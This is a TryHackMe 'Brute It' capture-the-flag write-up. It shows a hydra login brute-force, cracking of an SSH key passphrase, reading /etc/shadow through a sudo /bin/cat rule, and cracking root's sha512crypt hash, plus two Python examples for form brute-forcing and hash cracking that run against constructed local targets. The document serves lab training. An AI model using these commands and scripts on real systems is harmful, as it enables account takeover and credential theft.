THM Writeup – Brute It
Learn how to brute-force a login, crack hashes and escalate privileges in this box!
In this box you will learn about:
- Brute-force
- Hash cracking
- Privilege escalation
Add the target's IP address to your hosts file (this needs root, or sudo):
echo '10.10.30.42 bruteit.thm' >> /etc/hosts
Scan the target machine to find open ports first (-sS needs root):
nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv bruteit.thm
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
Get more details about open ports:
nmap -T4 -A -p 22,80 bruteit.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
| 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Now you can answer a few questions:
How many ports are open?
What version of SSH is running?
What version of Apache is running?
Which Linux distribution is running?
Run a directory scan on the web application:
gobuster dir -u http://bruteit.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
2022/02/11 07:37:13 Starting gobuster
===============================================================
/index.html (Status: 200)
/admin (Status: 301)
/server-status (Status: 403)
===============================================================
2022/02/11 07:40:20 Finished
===============================================================
You can answer this question:
What is the hidden directory?
Check the web application running on port 80: browse to http://bruteit.thm
There is only the default Apache page.
I viewed the page source, reviewed the information in developer console – found nothing interesting.
Browse to the admin page http://bruteit.thm/admin
View the page source:
Do you see the comment? It gives away the username.
So we know the username; we use hydra to find the password, but first we need to know a few things:
- whether the login request is GET or POST
- what the username and password parameters are called
- what the response looks like when the credentials are incorrect
- whether there is a cookie we need to send with each request
Open the developer console (press F12) and try to log in, e.g. with admin and password:
OK, as we can see here:
- the POST method is used
- the username parameter is user, the password parameter is pass
- if the provided credentials are incorrect, a “Username or password invalid” message appears
- and if we click on the Cookies tab, there is a cookie we need to set with hydra
Now we can use hydra (-l single username, -P password list, -V print every attempt, -t 4 parallel tasks, -f stop after the first valid pair). The third colon-separated field of the form spec is the failure string: any response that does not contain it counts as a hit. Replace the PHPSESSID value with the one from your own browser session, since a stale session can get a different response and confuse the failure-string check:
hydra -l admin -P /usr/share/wordlists/rockyou.txt bruteit.thm http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password invalid:H=Cookie: security=low; PHPSESSID=esvtn7r8s3q2248hp62nok4uf8" -V -t 4 -f
[80][http-post-form] host: bruteit.thm login: admin password: [REDACTED]
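To make the hydra decision rule concrete, here is an added example (not part of the original writeup and not the box's code) that brute-forces a POST login form the same way: it POSTs user/pass pairs with a fixed Cookie header and treats a response without the failure string as the hit. The login page, the session cookie value, the password tr1al-secret and the five-word list are all constructed for the demo and run on a loopback port, so nothing here touches the real target. It also shows the caveat from above: with a wrong cookie every request fails for the same reason, so the loop stops instead of reporting a false hit.

```python
import socketserver
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the /admin/ login form. The box's real password is
# not reproduced; DEMO_PASS, DEMO_COOKIE and WORDLIST are made up for the demo.
DEMO_USER = "admin"
DEMO_PASS = "tr1al-secret"
FAIL_STRING = "Username or password invalid"
DEMO_COOKIE = "PHPSESSID=demo-session"
WORDLIST = ["123456", "password", "letmein", "tr1al-secret", "dragon"]


class LoginHandler(BaseHTTPRequestHandler):
    """Fake /admin/ endpoint: POST with user/pass fields and a session cookie."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        if DEMO_COOKIE not in self.headers.get("Cookie", ""):
            status, body = 403, b"no session"          # stale or missing cookie
        elif fields.get("user") == [DEMO_USER] and fields.get("pass") == [DEMO_PASS]:
            status, body = 200, b"Welcome back, admin"
        else:
            status, body = 200, FAIL_STRING.encode()   # a bad login is still HTTP 200
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo server quiet


class LocalServer(HTTPServer):
    def server_bind(self):
        # Skip HTTPServer's reverse-DNS lookup so the demo never touches the network.
        socketserver.TCPServer.server_bind(self)
        self.server_port = self.socket.getsockname()[1]


# Opener without proxy handling, so loopback requests never go to an http_proxy.
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def try_login(url, user, password, cookie):
    """One POST attempt; returns (status, body) even for HTTP error statuses."""
    data = urllib.parse.urlencode({"user": user, "pass": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", cookie)
    try:
        with _OPENER.open(req) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def brute_force(url, user, wordlist, cookie, fail_string=FAIL_STRING):
    """Same rule as hydra's http-post-form: a guess is right when the failure
    string is absent. A non-200 answer means the session/cookie is wrong, which
    would otherwise look like a hit on the very first guess."""
    for candidate in wordlist:
        status, body = try_login(url, user, candidate, cookie)
        if status != 200:
            raise RuntimeError(f"HTTP {status}: check the session cookie before continuing")
        if fail_string not in body:
            return candidate
    return None


def demo(cookie=DEMO_COOKIE):
    """Start the fake login page on a random loopback port and brute-force it."""
    server = LocalServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return brute_force(f"http://127.0.0.1:{server.server_port}/admin/",
                           DEMO_USER, WORDLIST, cookie)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("found:", demo())
```

Against a real target you would swap the loopback URL for http://bruteit.thm/admin/, the cookie for your own PHPSESSID, and the list for rockyou.txt; the failure-string logic stays the same, which is why choosing a string that appears only on a failed login matters so much.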
Log in with the credentials admin:[REDACTED] and grab the web flag:
Download the RSA private key: right click and Save Link As…
The key is passphrase-protected, so turn it into a john hash with ssh2john (shipped with John the Ripper jumbo; on Kali it lives at /usr/share/john/ssh2john.py) and try to crack it:
ssh2john.py id_rsa > id_rsa.hash
john -w=/usr/share/wordlists/rockyou.txt id_rsa.hash
[REDACTED] (id_rsa)
Now log in to the target machine via SSH, using john as the username, the downloaded private key and the cracked passphrase (first we need to restrict the private key's permissions, otherwise ssh refuses to use it):
root@ip-10-10-244-156:~# chmod 600 id_rsa
root@ip-10-10-244-156:~# ssh john@bruteit.thm -i id_rsa
The authenticity of host 'bruteit.thm (10.10.30.42)' can't be established.
ECDSA key fingerprint is SHA256:6/bVnMDQ46C+aRgroR5KUwqKM6J9jAfSYFMQIOKckug.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'bruteit.thm,10.10.30.42' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
john@bruteit:~$
Find the user flag and read it:
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt
THM{[REDACTED]}
Now we need to find a privilege escalation vector; start off with the basics:
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/cat
Great, we can run /bin/cat as root, so we can grab the root flag right away:
john@bruteit:~$ sudo /bin/cat /root/root.txt
THM{[REDACTED]}
Now we need to find out root's password somehow. That should be easy since we can run cat as root, which lets us read /etc/shadow (only cat runs privileged here; the grep runs as john, which is all we need):
john@bruteit:~$ sudo /bin/cat /etc/shadow | grep '^root:'
root:$6$zdk0.jUm$Vya2[REDACTED]88U9yUXEVgL.:18490:0:99999:7:::
Copy root's line from /etc/shadow, save it to a file, e.g. hash, and try to crack it with john (the $6$ prefix marks a sha512crypt hash; john detects it on its own, or pass --format=sha512crypt explicitly):
john -w=/usr/share/wordlists/rockyou.txt hash
[REDACTED] (root)
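What john is actually doing with that $6$ line is worth seeing once. The following is an added example, not code from the writeup or from John the Ripper: a pure-Python sha512crypt following Drepper's published specification, plus a minimal wordlist attack on one shadow line. The shadow line is constructed (it reuses the salt zdk0.jUm shown above, but with the made-up password demo-pass), and the wordlist is made up too. The 5000 default rounds are why cracking is slow compared with the web brute-force: every guess costs thousands of chained SHA-512 operations.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _grow(digest: bytes, length: int) -> bytes:
    """Repeat a digest to exactly `length` bytes (spec steps 9-10, 16 and 20)."""
    return (digest * (length // len(digest) + 1))[:length]


def sha512_crypt(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    """Pure-Python sha512crypt (the $6$ scheme in /etc/shadow), following
    Drepper's specification step by step. Slow by design: `rounds` chained SHA-512s."""
    salt = salt[:16]                                  # at most 16 salt bytes are used
    digest_b = hashlib.sha512(password + salt + password).digest()

    ctx_a = hashlib.sha512(password + salt)
    ctx_a.update(_grow(digest_b, len(password)))
    n = len(password)
    while n:                                          # bits of the length, lowest first
        ctx_a.update(digest_b if n & 1 else password)
        n >>= 1
    digest_a = ctx_a.digest()

    dp = hashlib.sha512(password * len(password)).digest()
    p_seq = _grow(dp, len(password))
    ds = hashlib.sha512(salt * (16 + digest_a[0])).digest()
    s_seq = _grow(ds, len(salt))

    c = digest_a
    for r in range(rounds):                           # the expensive part
        ctx = hashlib.sha512(p_seq if r & 1 else c)
        if r % 3:
            ctx.update(s_seq)
        if r % 7:
            ctx.update(p_seq)
        ctx.update(c if r & 1 else p_seq)
        c = ctx.digest()

    out = []

    def b64_from_24bit(b2: int, b1: int, b0: int, count: int) -> None:
        w = (b2 << 16) | (b1 << 8) | b0
        for _ in range(count):
            out.append(ITOA64[w & 0x3F])
            w >>= 6

    for k in range(21):                               # the scheme's fixed byte shuffle
        a = (22 * k) % 63
        b64_from_24bit(c[a], c[(a + 21) % 63], c[(a + 42) % 63], 4)
    b64_from_24bit(0, 0, c[63], 2)

    rounds_tag = f"rounds={rounds}$" if rounds != 5000 else ""
    return "$6$" + rounds_tag + salt.decode() + "$" + "".join(out)


def parse_shadow_field(field: str):
    """Return (rounds, salt, hash) from a $6$[rounds=N$]salt$hash shadow field."""
    parts = field.split("$")                           # ['', '6', ..., salt, hash]
    if len(parts) < 4 or parts[1] != "6":
        raise ValueError("not a sha512crypt ($6$) hash; pick another john format")
    rounds = 5000
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
    return rounds, parts[-2], parts[-1]


def crack_shadow_line(line: str, wordlist):
    """Wordlist attack on one /etc/shadow line, like `john hash` does."""
    user, field = line.split(":")[:2]
    rounds, salt, target = parse_shadow_field(field)
    for candidate in wordlist:
        computed = sha512_crypt(candidate.encode(), salt.encode(), rounds)
        if computed.rsplit("$", 1)[1] == target:
            return user, candidate
    return user, None


# Constructed shadow line: the writeup's salt, but a made-up password (demo-pass).
DEMO_LINE = "root:" + sha512_crypt(b"demo-pass", b"zdk0.jUm") + ":18490:0:99999:7:::"
WORDLIST = ["123456", "password", "iloveyou", "demo-pass", "dragon"]

if __name__ == "__main__":
    print(crack_shadow_line(DEMO_LINE, WORDLIST))
```

The salt is public in the hash, so cracking is per-account work that cannot be shared across users with different salts; the rounds= tag, when present, multiplies the cost further, and a reference implementation like this one is orders of magnitude slower than john's optimised code, which is why the real run uses john and not Python.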
Do you like this writeup? Check out other THM Writeups.